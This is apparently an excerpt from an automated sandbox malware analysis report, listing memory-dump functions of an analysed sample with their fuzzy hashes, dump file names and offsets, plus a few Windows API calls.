Opcode Fuzzy Hash: 27977281b23dd4159b7d348fcb3a7ccbd47c5aa57fcaa8f5999b68d37d2eccd5
Instruction Fuzzy Hash: BD317C31B00215AFDB18EB38C9546EEB7F1EB49744F204578E606EB394DB369D82CB91

Function 00111138 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e43b47ec83ace9337d6a4f6702d17b70770eeaa0323b7cc7344e2c43a1278761
Instruction ID: 04e08b0c8c67589302697ad2abc89245c7002071db7e0e10fa3c2fa0751d2fe0
Opcode Fuzzy Hash: e43b47ec83ace9337d6a4f6702d17b70770eeaa0323b7cc7344e2c43a1278761
Instruction Fuzzy Hash: 9141CC71262346CFCB0AFF2CE9809563FEAFB963047005169D0556B276DBB4690BDFA0

Function 357CB298 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6dd88288ca1fb75c7ca9423c46a5ee0f61beea79bfd79aeffeebbb14ee2d54a
Instruction ID: ebec2116c8333cb39a5dd785fb1a2a7a3f021dde18b4b75fb94cd02c02298ca9
Opcode Fuzzy Hash: e6dd88288ca1fb75c7ca9423c46a5ee0f61beea79bfd79aeffeebbb14ee2d54a
Instruction Fuzzy Hash: 7B31E530A003098BDF15DFA8D594A8EB7B7FF85300F508569E409EB200EB70A846CB40

Function 0011269F Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e4f1590e432e4816b27b1e0ca249c5c249878794a0e9f22b1b2ba900158d5f0
Instruction ID: 37fe6bcfcdbad53656eccc3874d359dd2d87668633646aa38aa13d95607d7b80
Opcode Fuzzy Hash: 7e4f1590e432e4816b27b1e0ca249c5c249878794a0e9f22b1b2ba900158d5f0
Instruction Fuzzy Hash: 3041FEB4D003499FDB14CFA9C580AEEBFB5FF48314F248029E809AB254DB75A985CB90

Function 00115059 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bbd2d857381e04cb51d1caf14d74db26b09305885bc1c2615f8c232609bb6c2
Instruction ID: 47cf9bc8fcc37b8f219fb1df39f7525982231e7c643f755aa2a3385274855918
Opcode Fuzzy Hash: 8bbd2d857381e04cb51d1caf14d74db26b09305885bc1c2615f8c232609bb6c2
Instruction Fuzzy Hash: 4C313630A00615DFDB19EB78C5546EE77F2AF8D344F2004B8E905AB399DB369C82CB91

Function 001126A8 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a26d674e71bc3caca4fd942e7880f5daf0f7e7aa46d648d93477f44667ae027b
Instruction ID: bd3df7cdd0127afd67a32eecd95f1b1808852a847629642978fc5d7a04efcb10
Opcode Fuzzy Hash: a26d674e71bc3caca4fd942e7880f5daf0f7e7aa46d648d93477f44667ae027b
Instruction Fuzzy Hash: 1041EEB0D003499FDB14DFA9C584ADEBFB5FF48314F248029E809AB254DB75A985CB90

Function 00115068 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5bf9dc8c70ffc0296aef57179cc799d0c299306e128e0a12809db7780cb1a02
Instruction ID: 40a0238374c0352926b8986a87a1b1f1371aebf5064509f3ca923fc208a71059
Opcode Fuzzy Hash: d5bf9dc8c70ffc0296aef57179cc799d0c299306e128e0a12809db7780cb1a02
Instruction Fuzzy Hash: 42314A30A00615DFDB59EB78C9546EE73F2AF8D344F100478E505AB394DB769C82CB91

Function 00117051 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3f456eb4abae4eef8b8efe45d887ff7ce4a84e3fd3f51bebf7ccdca5dd7471b
Instruction ID: 278804415463d748d31ae24cd0d8c80bffd5c30cd895761e43c229c0cad363a3
Opcode Fuzzy Hash: b3f456eb4abae4eef8b8efe45d887ff7ce4a84e3fd3f51bebf7ccdca5dd7471b
Instruction Fuzzy Hash: CE314C347102159FDB09EB78D458A6E77BBEF88704F108468E40A9B3A9CF359C47CB91

Function 357C0FF8 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5be3e5ec2175d1deb1978a47969bd04e4e66945950481121038d4b75da034028
Instruction ID: 899f01f6ee4bd1dae6876db4793f0c8d4be5fd534d37ce63010218e57667e11b
Opcode Fuzzy Hash: 5be3e5ec2175d1deb1978a47969bd04e4e66945950481121038d4b75da034028
Instruction Fuzzy Hash: 1F218D75F002859FDB01DF68D981A9EBBF1FB48310F1080A9E914EB350E736D982CB95

Function 00119AB7 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d911acb8843cf9ec96edb736fb5b520afd061b78f252862ce322443168596160
Instruction ID: 75e069c05f402e977542cd0af099ca5fe63780b6072df947dcd5aa22e150c29d
Opcode Fuzzy Hash: d911acb8843cf9ec96edb736fb5b520afd061b78f252862ce322443168596160
Instruction Fuzzy Hash: 7B21DE30A141058FEB08CB78D964BEE3BF6EF88710F248165E511EB3A0DB719C84CB90

Function 357C1008 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b987fb6bf32ed034923247f2072129ec5fabb12b2c6cd90bc7f87e271bb5b9
Instruction ID: 4173271959356355474a1997b933ccdcea7390f0f710c5ea84cee794e109708b
Opcode Fuzzy Hash: f8b987fb6bf32ed034923247f2072129ec5fabb12b2c6cd90bc7f87e271bb5b9
Instruction Fuzzy Hash: 2F217C75E002959FDB00DF69DA80A9EBBF6FB48310F108079E915EB340E735D982CB95

Function 00111340 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e1d3afffb5c563e2dd841d03db3d7a818193353244d1124deadf572598d9543
Instruction ID: 0423f52a07a9124d8992c5bd4027068c0f9702069daf1fa2e816165cda7ac191
Opcode Fuzzy Hash: 7e1d3afffb5c563e2dd841d03db3d7a818193353244d1124deadf572598d9543
Instruction Fuzzy Hash: 0821D430610210AFDF29576CD8483ED7B91FB42320F14047EE156CBAA5D7248CC2C752

Function 00114F48 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe4b950702dd196b3f3a5a0d71d839da1e55bf2b446155543410af0e9d130af
Instruction ID: e581079932bf60e7658213ba19472547ac69a8ecfc5b1cbc2d49f7c50f075170
Opcode Fuzzy Hash: 5fe4b950702dd196b3f3a5a0d71d839da1e55bf2b446155543410af0e9d130af
Instruction Fuzzy Hash: 7321F534A10605CFDB58EF68D959AAE77F1EB8D740F100468E406EB3A1DB359D42CB91

Function 000AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278518403.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ad000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26b83984b07c944cdb81e7f1952d7e6b29d11b35c8b36076b881454aa43813af
Instruction ID: 2a0406d370e61e68b26e6ae65141881bb2c1fc674dbdd63f713c98ffb73de3b5
Opcode Fuzzy Hash: 26b83984b07c944cdb81e7f1952d7e6b29d11b35c8b36076b881454aa43813af
Instruction Fuzzy Hash: 8221F271604204DFCB24DFA4D984F26BFA5EB89314F20C56AD94A4B656C37AD807CA62

Function 00111848 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071dde464b2c2f64120f9ae75c44268acc36ab5424595cd03caad1c4b2dbae92
Instruction ID: 1be5d140d461b24f88fa291e1233ed76594c005c51cf88aaa1cdf59b96024603
Opcode Fuzzy Hash: 071dde464b2c2f64120f9ae75c44268acc36ab5424595cd03caad1c4b2dbae92
Instruction Fuzzy Hash: 87213930B002099FDB58EB78D5247EEB7F6AB49344F100478D606EB394EB769D81CBA1

Function 00111670 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7a7ef06efedaf6007fdf38df2b82836a809989400ff4f5b00b2813338dfb58e
Instruction ID: 0d6391525c7081a0d22c1af70c019888090679d88a7401802f70a7c333447c21
Opcode Fuzzy Hash: c7a7ef06efedaf6007fdf38df2b82836a809989400ff4f5b00b2813338dfb58e
Instruction Fuzzy Hash: CE2193302102015FDF2AEB2CE984BA9779AEB45304F105939D11ACB3E5DB79DC87CBA1

Function 00114F58 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca1771990c464402bffed11062cb91fe01dac9319cb50fcd8cda6bc7add760fe
Instruction ID: f4ee8b56b1cdad56d9c0a89b345aab2adb66477fa259810765ea0298aeaed265
Opcode Fuzzy Hash: ca1771990c464402bffed11062cb91fe01dac9319cb50fcd8cda6bc7add760fe
Instruction Fuzzy Hash: 71211634A10205CFDB58EB78C958AAE77F2EB8C740F100478E406EB3A0DB359D41CB91

Function 00111783 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd506d1db8598fc7240d995598d114cd66b9a525eb32d38cdc889666ec9605d9
Instruction ID: 3e7b62db1b705a8d6b6139928ea35eef3eba23ec3e064ef5706a33cdc34f563d
Opcode Fuzzy Hash: fd506d1db8598fc7240d995598d114cd66b9a525eb32d38cdc889666ec9605d9
Instruction Fuzzy Hash: 0111E231B00242AFCB16AB78980869FBBF5EB48714F20457AD64AD7341EB318843CBD2

Function 000AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278518403.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ad000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f046f8f49a0e0d9ec856190d5e8b6a84e1a295abb6b10ef0d73dfb89e86e8ebc
Instruction ID: fc48f01d7e4105d2c546bd1eb06c1f2ffdefca563886a949225241eaf7565f22
Opcode Fuzzy Hash: f046f8f49a0e0d9ec856190d5e8b6a84e1a295abb6b10ef0d73dfb89e86e8ebc
Instruction Fuzzy Hash: 4E2171755083809FCB02CF64D994B11BFB1EB46314F28C5DAD8898F667C33A9816CB62

Function 357C05B8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072bd4b620d881938b3ca739ff91762b4371846eee1c176e754437a0dc407302
Instruction ID: 16637d4958bc2f9620c497fc948f3ab100593513111aedb3278c4307ba14075a
Opcode Fuzzy Hash: 072bd4b620d881938b3ca739ff91762b4371846eee1c176e754437a0dc407302
Instruction Fuzzy Hash: F1119375E002249BCB58DFA9D8405DEF7F6EBC9314F1085AAD409EB340EA31D941CBD1

Function 00110848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08503acb4f2fbe30ddd8fd78ecc24c815520dad0bda32b1e17942e9af3d46464
Instruction ID: 7fdf6a3887a1d956d4cbc401eebf9464d9ec7fdbadeda9e2e0b942fa3f178e88
Opcode Fuzzy Hash: 08503acb4f2fbe30ddd8fd78ecc24c815520dad0bda32b1e17942e9af3d46464
Instruction Fuzzy Hash: FD119130F082048FDF6EAA79C9507AE3295EB89310F204979E006DB391DBA4CCC68FD1

Function 00111448 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68b0a9edf7c62af421dac2b13206605e8e95404a3056e725884a56f6f88ed97b
Instruction ID: 2418aca1b37bbcabca11eacbd48ae2a27d2888cbbec97269aca232c8df4cd9aa
Opcode Fuzzy Hash: 68b0a9edf7c62af421dac2b13206605e8e95404a3056e725884a56f6f88ed97b
Instruction Fuzzy Hash: EA119E31A002259FCF6AAFB984512EDBBF5EF59710B210479E905EB242E735C8828B91

Function 357C1118 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de6338f526478fedba85cfe7235646052fd5a4678b3f45b92613cbac82be3a78
Instruction ID: 82126a9e0e496e356b50195ce506014dcce8bf785c62c19a47e1fb169a205443
Opcode Fuzzy Hash: de6338f526478fedba85cfe7235646052fd5a4678b3f45b92613cbac82be3a78
Instruction Fuzzy Hash: F5118E36B201244BEB04D668CD1469E77E7EBC9350F018579D40AEB344DF69DC038B91

Function 357C1108 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0fbe98cbd2eec7b43c017a8688810d6f0a19d0970ce53ad874349d1e80f0b95
Instruction ID: 66bb264adcdd63df1308c73a288e0354aede419999eb1764b22c3f4e564a00c5
Opcode Fuzzy Hash: d0fbe98cbd2eec7b43c017a8688810d6f0a19d0970ce53ad874349d1e80f0b95
Instruction Fuzzy Hash: A9112636B601954BEB06DA78CD146DA7BF7EBC5360F4540BAC046EB244DF69CC078792

Function 357C1351 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1caaea7a106d3f6e2de7f5578ef905ef8d22e4b9feed42c1833b1be1ee48248
Instruction ID: 9b19194c026c5ad2a2dcaf5ce4fc78b2f6f65364035184ad8cf29331f1a77874
Opcode Fuzzy Hash: d1caaea7a106d3f6e2de7f5578ef905ef8d22e4b9feed42c1833b1be1ee48248
Instruction Fuzzy Hash: E101DF35F002500BE70596ADD455B0FB7DBEBC6725F1088BAE40ACBB91EE65DC034391

Function 357C3D70 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2943164cc0dc9f73c30f38f749317c27cafc6c218f538d31495a53f1596c6c9a
Instruction ID: 5649b7b1564c6bd6c3fe23e7532f7f52a419f4121616d10af4df46be8dccc7b8
Opcode Fuzzy Hash: 2943164cc0dc9f73c30f38f749317c27cafc6c218f538d31495a53f1596c6c9a
Instruction Fuzzy Hash: 0001B16590E3E51EEB039B3C9EA458A3FB99F07288F0641D3C084CF1A3E136CA49C359

Function 00111458 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49f542088e55d4a48b3d9c288c2668321168f967fe003cae50b6cfc7a2a29d53
Instruction ID: 15e7716b04c6af4edfd89b663e5ae83f4e98f936a4a9369cfb24b6abbe25701a
Opcode Fuzzy Hash: 49f542088e55d4a48b3d9c288c2668321168f967fe003cae50b6cfc7a2a29d53
Instruction Fuzzy Hash: 9F016D31E003159FCF29EFB984522EDBBE5EB58710F250479E905E7241EB35D8C28BA5

Function 357C0DD8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6ca15db774381bf02b76c46e9cfc1c0052f7cfaccc208d029297c2f8b422fc9
Instruction ID: 7b99b9bf006d602bb5a3df97e5f20c4d082a0c13b95154868d5a1e92a177bad7
Opcode Fuzzy Hash: e6ca15db774381bf02b76c46e9cfc1c0052f7cfaccc208d029297c2f8b422fc9
Instruction Fuzzy Hash: A411B0B5D01259AFCB00DF9AD984ADEFBB4FF49314F10816AE918A7240C378A954CBE5

Function 357C0DD3 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f9514ae8f840698c9af49a494358c41f55e850214982bb27d9394dfb589d16c
Instruction ID: 3b8a49e3ab4a077b7f51227319a40ea5783cb0205bc0a2cee74bae27615e4e71
Opcode Fuzzy Hash: 8f9514ae8f840698c9af49a494358c41f55e850214982bb27d9394dfb589d16c
Instruction Fuzzy Hash: 9C21D0B5D01259AFCB00DF9AD884ADEFFB4FF49310F10816AE918A7210C378A950CBE5

Function 357C1360 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166fd6bf2072c89ea3872c1391b8614caeeb53042d744df2cc0c949e13b54f45
Instruction ID: 5520df5d5f152890ce2d7088f4da06678bf677226ddb50e5309f50103a778a17
Opcode Fuzzy Hash: 166fd6bf2072c89ea3872c1391b8614caeeb53042d744df2cc0c949e13b54f45
Instruction Fuzzy Hash: F001AD35F001500BE70496ADD454B1EB7DBEBC9B25F108479E40ECBB94EE61DC034391

Function 357CA0EF Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 092ebaf1df8ef2e3318317465afa3c07403e4073b0ef5b59b2fa8ad141f075e6
Instruction ID: 9695acb5c69db25f14d4cbe39666f7d6449e563424ef9ca08a2faec6468cc597
Opcode Fuzzy Hash: 092ebaf1df8ef2e3318317465afa3c07403e4073b0ef5b59b2fa8ad141f075e6
Instruction Fuzzy Hash: EA012432E202249BDB059E68E851A8DB7B6FB88351F5045B9E801EF341DB32E8468B80

Function 357CEA70 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67350617cd19188bd10b6f768feb93f268cfc1ddcda1814879122cf622d7c5fd
Instruction ID: 6a87b059d44fcaef433f04163d69eca2ab826b3f092701c1149b43de28594c5c
Opcode Fuzzy Hash: 67350617cd19188bd10b6f768feb93f268cfc1ddcda1814879122cf622d7c5fd
Instruction Fuzzy Hash: 310128357102054FE722567CA914A1E7AD7EBC2361F1509BAE409DF352DB60DC4A8391

Function 00118183 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9798163d1e9e37387034e57af739a37050490ece89ebd08c8780384a1a6e2d2
Instruction ID: 901ed9abccc9ce79736557001ab96996f7d76c3b6ed673a0d7e09fd279fef4c6
Opcode Fuzzy Hash: f9798163d1e9e37387034e57af739a37050490ece89ebd08c8780384a1a6e2d2
Instruction Fuzzy Hash: AD017131950249DFCB46EFBCE95059D7BF5DF41304B4056B5C004AB266DE305E0BCB51

Function 00118190 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b02717a7a3cb3440c1f17909ae6abaf44c82e2414d3cc135d5ed8c5693bd5e1
Instruction ID: abb366a94104fd28a0ebb200518c8fae49304185d5c6639fd25460382efd87a7
Opcode Fuzzy Hash: 8b02717a7a3cb3440c1f17909ae6abaf44c82e2414d3cc135d5ed8c5693bd5e1
Instruction Fuzzy Hash: 1FF0FB30950209DFCB46FBA8E95199D7BF9EF80304B5056B9C414AB255DA306E0A8BA1

Function 357CE058 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45de143f5446b619d374932aa3c1d058b765df0ca1af970a616f9f0f31098e8b
Instruction ID: 50af03fa81d6a488a9a169fa211b7f704052b245c80fb283f9526bcc0d686c70
Opcode Fuzzy Hash: 45de143f5446b619d374932aa3c1d058b765df0ca1af970a616f9f0f31098e8b
Instruction Fuzzy Hash: A3D0972092832007D332A124A0243837BCAFB40350FA0C9EAF02AC7680CAACA88247C0

Function 357CE068 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54ef87b312a0e044a60b3793a2eded1920c8859fea334ebc22b5ab11ccfbe548
Instruction ID: 7800a2ad92aea8c5ed3c2dfe7580b4299a725c5b7d846955c10f715998bf18c2
Opcode Fuzzy Hash: 54ef87b312a0e044a60b3793a2eded1920c8859fea334ebc22b5ab11ccfbe548
Instruction Fuzzy Hash: AFD0A730A19B148BD331D659E104653B7DAFB88710F90486DF49B87E80CBA5FC418BC0

Function 00116BCC Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278693657.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_110000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a5c84a876baccbe6d06550c11bddef624980fe578e409af2b2b55962569720c
Instruction ID: a803438837bcc0ab2d6aca8461d8fe1e0aa16c3bc306f6769137f0516b4ff682
Opcode Fuzzy Hash: 1a5c84a876baccbe6d06550c11bddef624980fe578e409af2b2b55962569720c
Instruction Fuzzy Hash: A1C0123A3080908F8A06A728E0644B837B2DBCA22932400AAE148CB362CE229802CB00

Non-executed Functions

Function 00403640 Relevance: 77.4, APIs: 33, Strings: 11, Instructions: 450stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008001), ref: 00403663
GetVersionExW.KERNEL32(?), ref: 0040368C
GetVersionExW.KERNEL32(0000011C), ref: 004036A3
